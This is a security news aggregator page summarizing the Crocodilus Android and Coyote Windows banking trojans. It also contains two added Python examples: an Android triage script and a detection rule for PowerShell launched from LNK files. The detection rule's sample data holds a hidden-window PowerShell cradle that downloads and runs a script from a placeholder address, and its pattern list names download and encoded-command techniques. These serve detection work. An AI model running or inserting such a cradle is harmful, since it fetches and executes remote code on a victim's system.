CyberSecurity news

FlagThis - #bankingtrojan

rohansinhacyblecom@cyble.com //
A new Android banking trojan called Crocodilus has been discovered, targeting users in Spain and Turkey. Cybersecurity experts warn that this sophisticated malware employs advanced techniques like remote control, black screen overlays, and data harvesting through accessibility logging. Crocodilus is designed to facilitate device takeover and conduct fraudulent transactions, masquerading as Google Chrome to bypass Android 13+ restrictions.

Once installed, Crocodilus requests access to Android's accessibility services and connects to a remote server for instructions and a list of targeted financial applications. The malware steals banking and crypto credentials by displaying HTML overlays and monitors all accessibility events to capture screen contents, including Google Authenticator details. Crocodilus conceals its malicious activity by displaying a black screen overlay and muting device sounds to avoid detection.

Recommended read:
References :
  • cyble.com: TsarBot: A New Android Banking Trojan Targeting Over 750 Banking, Finance, and Cryptocurrency Applications
  • thehackernews.com: New Android Trojan Crocodilus Abuses Accessibility to Steal Banking and Crypto Credentials
  • gbhackers.com: “Crocodilus” A New Malware Targeting Android Devices for Full Takeover
  • securityaffairs.com: The new Android trojan Crocodilus exploits accessibility features to steal banking and crypto credentials, mainly targeting users in Spain and Turkey.
  • ciso2ciso.com: Cybersecurity researchers have discovered a new Android banking malware called Crocodilus that’s primarily designed to target users in Spain and Turkey.
  • BleepingComputer: A newly discovered Android malware dubbed Crocodilus tricks users into providing the seed phrase for the cryptocurrency wallet using a warning to back up the key to avoid losing access.
  • The DefendOps Diaries: Discover how Crocodilus malware exploits Android devices, threatening cryptocurrency security with advanced RAT capabilities and social engineering.
  • cointelegraph.com: Android malware ‘Crocodilus’ can take over phones to steal crypto
  • Talkback Resources: TsarBot: A New Android Banking Trojan Targeting Over 750 Banking, Finance, and Cryptocurrency Applications
  • www.scworld.com: Advanced Crocodilus Android trojan emerges. Widely known cryptocurrency wallets, as well as banks in Spain and Turkey, have already been targeted in attacks involving the novel sophisticated Crocodilus Android trojan, which combines bot and remote access trojan capabilities to facilitate banking and cryptocurrency credential compromise, according to Security Affairs.
  • Metacurity: The new Android trojan Crocodilus exploits accessibility features to steal banking and crypto credentials, mainly targeting users in Spain and Turkey.
  • Blog: New Crocodilus malware snaps up crypto wallets
  • thecyberexpress.com: Cyble researchers have discovered a new Android banking trojan that uses overlay attacks and other techniques to target more than 750 applications, including banking, finance, cryptocurrency, payment, social media, and e-commerce applications.
  • securityonline.info: Android Under Attack: Crocodilus Trojan Captures OTPs from Google Authenticator
  • www.cysecurity.news: New Android Banking Trojan 'Crocodilus' Emerges as Sophisticated Threat in Spain and Turkey

rohansinhacyblecom@cyble.com //
A new Android malware named Crocodilus has been discovered targeting cryptocurrency users, primarily in Spain and Turkey. Cybersecurity researchers have found that Crocodilus employs sophisticated techniques, including remote control capabilities, black screen overlays, and advanced data harvesting through accessibility logging. The malware is designed to steal banking and cryptocurrency credentials, posing a significant threat to Android users in these regions.

Crocodilus tricks users into divulging their cryptocurrency wallet seed phrases by displaying a fake warning urging them to back up their keys to avoid losing access. It also exploits accessibility features to monitor app launches, display overlays to intercept credentials, and capture screen contents, including Google Authenticator OTP codes. This allows attackers to gain full control of wallets and drain assets. The malware also features call and SMS control, device admin and persistence, social engineering, and remote commands and settings update capabilities.

ThreatFabric researchers note that Crocodilus exhibits a high level of maturity for a newly discovered threat, demonstrating advanced device takeover capabilities. The malware is distributed via a proprietary dropper that bypasses Android 13 security protections and installs the malware without triggering Play Protect. Analysis of the source code suggests that the malware author is Turkish-speaking.

Recommended read:
References :
  • BleepingComputer: A newly discovered Android malware dubbed Crocodilus tricks users into providing the seed phrase for the cryptocurrency wallet using a warning to back up the key to avoid losing access.
  • securityaffairs.com: Experts warn of the new sophisticate Crocodilus mobile banking Trojan
  • thehackernews.com: Cybersecurity researchers have discovered a new Android banking malware called Crocodilus that's primarily designed to target users in Spain and Turkey.
  • www.scworld.com: Advanced Crocodilus Android trojan emerges. Widely known cryptocurrency wallets, as well as banks in Spain and Turkey, have already been targeted in attacks involving the novel sophisticated Crocodilus Android trojan, which combines bot and remote access trojan capabilities to facilitate banking and cryptocurrency credential compromise, according to Security Affairs.
  • Blog: New Crocodilus malware snaps up crypto wallets
  • The420.in: Crypto Under Attack: Crocodilus Malware Targets Android Users
  • securityonline.info: Android Under Attack: Crocodilus Trojan Captures OTPs from Google Authenticator
  • www.cysecurity.news: New Android Banking Trojan 'Crocodilus' Emerges as Sophisticated Threat in Spain and Turkey
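Both Crocodilus summaries above come down to the same combination on the device: an accessibility service nobody approved, the overlay permission on the same package, and a package name that imitates a familiar app such as Chrome. The Python script below is an added triage example written for this page; it is not code from Cyble, ThreatFabric or any of the linked articles. It works from the output of two adb commands (`settings get secure enabled_accessibility_services` and `appops get <package> SYSTEM_ALERT_WINDOW`); the output formats it parses, the approved-service allowlist and every package name in the sample are assumptions or constructed samples, not indicators taken from the reports.

```python
"""Triage an Android device for the accessibility-plus-overlay combination that
Crocodilus-style banking trojans rely on. Added example, not from the page's sources.
Inputs are CONSTRUCTED samples of two adb commands' output:
  adb shell settings get secure enabled_accessibility_services
  adb shell appops get <package> SYSTEM_ALERT_WINDOW
Both output formats are assumptions about current Android builds."""
from dataclasses import dataclass

# Assumption: accessibility services a fleet administrator has approved (e.g. TalkBack).
APPROVED_SERVICES = {
    "com.google.android.marvin.talkback/com.google.android.marvin.talkback.TalkBackService",
}
# Genuine package names of apps that malware likes to imitate (assumed lookalike heuristic).
GENUINE_PACKAGES = {"chrome": "com.android.chrome"}


@dataclass
class Finding:
    package: str
    severity: str
    reason: str


def parse_enabled_services(raw: str) -> list[tuple[str, str]]:
    """Split the colon-separated 'package/service' list; expand the '.Service' shorthand."""
    result = []
    for entry in raw.strip().split(":"):
        if not entry:
            continue
        package, _, service = entry.partition("/")
        if service.startswith("."):
            service = package + service
        result.append((package, service))
    return result


def overlay_allowed(appops_output: str) -> bool:
    """True when appops reports SYSTEM_ALERT_WINDOW mode 'allow' (assumed format)."""
    for line in appops_output.splitlines():
        if line.strip().startswith("SYSTEM_ALERT_WINDOW:"):
            mode = line.split(":", 1)[1].split(";")[0].strip()
            return mode == "allow"
    return False


def triage(services_raw: str, appops_by_package: dict[str, str]) -> list[Finding]:
    """Rate each unapproved accessibility service; overlay rights or a lookalike name raise severity."""
    findings = []
    for package, service in parse_enabled_services(services_raw):
        if f"{package}/{service}" in APPROVED_SERVICES:
            continue
        if overlay_allowed(appops_by_package.get(package, "")):
            findings.append(Finding(package, "high",
                                    "unapproved accessibility service AND overlay permission"))
        else:
            findings.append(Finding(package, "medium", "unapproved accessibility service"))
        for brand, genuine in GENUINE_PACKAGES.items():
            if brand in package.lower() and package != genuine:
                findings.append(Finding(package, "high", f"package name imitates {genuine}"))
    return findings


# CONSTRUCTED sample output; the second package is an invented lookalike, not a real IoC.
SAMPLE_SERVICES = (
    "com.google.android.marvin.talkback/com.google.android.marvin.talkback.TalkBackService:"
    "com.chrome.update.secure/.AccessService"
)
SAMPLE_APPOPS = {
    "com.google.android.marvin.talkback": "SYSTEM_ALERT_WINDOW: default\n",
    "com.chrome.update.secure": "SYSTEM_ALERT_WINDOW: allow; time=+5m12s ago\n",
}

if __name__ == "__main__":
    for f in triage(SAMPLE_SERVICES, SAMPLE_APPOPS):
        print(f"[{f.severity}] {f.package}: {f.reason}")
```

In a fleet setting the two command outputs would be collected by an MDM or over adb; the allowlist is the control that matters, since a legitimate screen reader is the only common reason for a third-party accessibility service to be enabled on a banking user's device.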

@securityonline.info //
Fortinet's FortiGuard Labs has issued a high-severity alert regarding the Coyote Banking Trojan. This sophisticated malware, targeting Microsoft Windows users, has expanded its reach to include 1,030 websites and 73 financial institutions. The malware is distributed through malicious LNK files that execute PowerShell commands, initiating a multi-stage attack. The primary goal is to harvest sensitive data, including system details and lists of installed antivirus products.

The attack sequence begins with a LNK file executing a PowerShell command to retrieve a next-stage PowerShell script, launching the trojan. Once deployed, the trojan gathers system information and evades detection by security measures. Should a victim attempt to access a targeted site, the malware communicates with a command-and-control server, enabling actions like capturing screenshots or displaying phishing overlays to steal sensitive credentials, impacting financial cybersecurity.

Recommended read:
References :
  • gbhackers.com: FortiGuard Labs has issued a high-severity alert regarding the Coyote Banking Trojan, a sophisticated malware targeting Microsoft Windows users.
  • www.scworld.com: Updated Coyote malware facilitates more extensive compromise
  • gbhackers.com: Coyote Malware Launches Stealthy Attack on Windows Systems via LNK Files
  • The Hacker News: Coyote Malware Expands Reach: Now Targets 1,030 Sites and 73 Financial Institutions
  • securityonline.info: SecurityOnline article about the multi-stage Coyote banking trojan targeting Brazil.
  • securityaffairs.com: Coyote Banking Trojan targets Brazilian users, stealing data from 70+ financial apps and websites
  • securityonline.info: Coyote Banking Trojan: A Multi-Stage Financial Cyber Threat Targeting Brazil

@securityonline.info //
The Coyote Banking Trojan is actively targeting financial institutions and online banking users in Brazil, stealing data from over 70 financial applications and websites. Cybersecurity researchers at FortiGuard Labs have uncovered this stealthy and highly sophisticated banking trojan which leverages malicious LNK files and PowerShell scripts to infiltrate Windows systems, deploy payloads, and steal sensitive banking credentials. The attack begins with a weaponized LNK file that executes a hidden PowerShell command, connecting to a remote server and downloading additional malicious scripts, initiating the next stage of the attack.

The Trojan can keylog user activity, capture screenshots, display phishing overlays, and even manipulate browser windows to steal financial data. It collects system information such as the machine ID, MAC address, Windows version, and installed security software, sending these details to remote command-and-control servers. The final payload includes the main Coyote Banking Trojan, which expands its target list to over 1,000 websites and 73 financial agents. Accessing any of the targeted sites could trigger further malicious activity, enhancing the threat to financial cybersecurity.

Recommended read:
References :
  • gbhackers.com: Coyote Malware Launches Stealthy Attack on Windows Systems via LNK Files
  • securityaffairs.com: Coyote Banking Trojan targets Brazilian users, stealing data from 70+ financial apps and websites
  • securityonline.info: Coyote Banking Trojan: A Multi-Stage Financial Cyber Threat Targeting Brazil
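Both Coyote summaries describe the same first hop: Explorer launches PowerShell from a weaponized LNK file, and that PowerShell fetches the next-stage script from a remote server. The Python below is an added detection example written for this page, not Fortinet's or any linked article's code. It assumes Sysmon-style process-creation fields (`Image`, `ParentImage`, `CommandLine`) and runs over constructed sample events; the URL and file paths are placeholders, not indicators from the reports.

```python
"""Flag LNK-launched PowerShell download cradles of the kind the Coyote chain uses.
Added example; the events below are CONSTRUCTED, and the Sysmon-style field names
(Image, ParentImage, CommandLine) are an assumption about the log schema."""
import json
import re

# Each pattern is one indicator; every hit adds to the event's score.
INDICATORS = [
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "inline execution (IEX)"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I), "download cradle"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"-w(in|indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-nop\b|-noprofile\b", re.I), "no profile"),
    (re.compile(r"\bbypass\b", re.I), "execution policy bypass"),
    (re.compile(r"https?://", re.I), "remote URL"),
]
# A double-clicked .lnk is launched by Explorer, so the shell's parent is explorer.exe.
LNK_PARENTS = {"explorer.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
ALERT_THRESHOLD = 2  # two or more indicators from an Explorer-spawned shell is an alert


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_command(cmdline: str) -> list[str]:
    """Return the names of every indicator present in the command line."""
    return [name for rx, name in INDICATORS if rx.search(cmdline)]


def analyze(raw_lines: list[str]) -> list[dict]:
    """Run the rule over JSON event lines and return the alerts it raises."""
    alerts = []
    for line in raw_lines:
        ev = json.loads(line)
        if basename(ev["Image"]) not in POWERSHELL:
            continue
        hits = score_command(ev["CommandLine"])
        if basename(ev["ParentImage"]) in LNK_PARENTS and len(hits) >= ALERT_THRESHOLD:
            alerts.append({"parent": ev["ParentImage"],
                           "indicators": hits,
                           "command": ev["CommandLine"]})
    return alerts


# CONSTRUCTED sample events. 203.0.113.10 is a documentation address, not a real C2.
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.10/stage2.ps1')\""},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe -NoExit -Command \"Get-ChildItem\""},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\services.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
]]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print("ALERT", alert["parent"], alert["indicators"])
        print("      ", alert["command"])
```

The threshold keeps an administrator's interactive `powershell.exe -Command Get-ChildItem` quiet while the hidden-window, no-profile, inline-download pattern in the first event scores on four indicators at once; the scheduled-task style invocation in the third event is not Explorer-spawned and is left to other rules.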